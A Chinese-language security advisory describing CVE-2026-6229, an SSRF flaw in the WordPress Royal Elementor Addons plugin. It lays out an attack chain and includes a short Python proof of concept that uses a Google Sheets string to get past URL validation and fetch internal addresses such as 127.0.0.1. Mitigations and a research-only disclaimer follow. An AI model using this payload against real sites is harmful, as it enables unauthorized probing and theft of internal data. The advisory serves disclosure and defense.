IPBUF安全漏洞报告
English
CVE-2026-6229 CVSS 7.2 高危

CVE-2026-6229 WordPress插件SSRF漏洞

披露日期: 2026-05-02
来源: [email protected]

漏洞信息

漏洞编号
CVE-2026-6229
漏洞类型
服务器端请求伪造 (SSRF)
CVSS评分
7.2 高危
攻击向量
网络 (AV:N)
认证要求
无需认证 (PR:N)
用户交互
无需交互 (UI:N)
影响产品
WordPress Royal Elementor Addons 插件

相关标签

SSRFWordPressWordPress PluginRoyal Elementor AddonsCWE-918

漏洞概述

WordPress Royal Elementor Addons插件在1.7.1057及之前版本中存在服务器端请求伪造(SSRF)漏洞。由于render_csv_data()函数对用户提供的URL验证不足,攻击者可以通过在查询参数中包含特定字符串绕过检查,并利用fopen()函数访问内部网络地址。拥有Contributor及以上权限的攻击者可利用此漏洞向任意URL发送请求,从而获取内部服务的敏感信息。

技术细节

该漏洞位于WordPress Royal Elementor Addons插件的wpr-data-table.php文件中。漏洞的根本原因是render_csv_data()函数在处理用户提供的URL时,验证逻辑存在缺陷。虽然插件实施了URL检查,但可以通过在请求参数中包含'docs.google.com/spreadsheets'字符串来成功绕过验证机制。绕过后,程序直接使用该未经充分净化的URL调用PHP的fopen()函数。由于fopen()未对内部或私有网络地址(如127.0.0.1, 192.168.x.x)进行拦截,攻击者可以利用此漏洞探测内网端口、读取本地文件或访问内部敏感服务。尽管CVSS向量显示无需认证,但实际利用场景通常需要Contributor级别的权限。

攻击链分析

STEP 1
侦察
攻击者识别出目标WordPress站点安装了Royal Elementor Addons插件,且版本低于1.7.1058。
STEP 2
获取权限
攻击者获取目标站点一个Contributor级别或更高权限的账户凭据(通过注册、社会工程学或撞库)。
STEP 3
漏洞利用
攻击者向wp-admin/admin-ajax.php发送POST请求,在action参数指定render_csv_data,并在url参数中注入包含'docs.google.com/spreadsheets'的恶意内网地址(如http://127.0.0.1)以绕过校验。
STEP 4
数据回显
服务器端使用fopen()请求攻击者指定的内网URL,并将响应内容返回给攻击者,导致内网信息泄露。

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
import requests target = "http://example.com" # Malicious URL targeting internal service, with bypass string internal_url = "http://127.0.0.1:80" bypass_payload = f"https://docs.google.com/spreadsheets/d/{internal_url}" # WordPress AJAX endpoint url = f"{target}/wp-admin/admin-ajax.php" # Data to exploit the vulnerability payload = { "action": "render_csv_data", "url": bypass_payload, # A valid nonce is typically required for authenticated actions "nonce": "[NONCE_VALUE]" } response = requests.post(url, data=payload) if response.status_code == 200: print("[+] SSRF Triggered. Response:") print(response.text) else: print("[-] Failed to trigger vulnerability")

影响范围

Royal Elementor Addons <= 1.7.1057

防御指南

临时缓解措施
如果无法立即升级,建议暂时禁用Royal Elementor Addons插件的Data Table模块。此外,可以在Web服务器层面配置出站防火墙规则,阻止Web服务器向内网IP段(如127.0.0.0/8, 10.0.0.0/8, 172.16.0.0/12, 192.168.0.0/16)发起请求。

参考链接

法律声明

以上信息仅供安全研究和授权渗透测试使用。未经授权对他人系统进行测试属于违法行为。利用本报告内容进行非法活动者,后果自负。

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表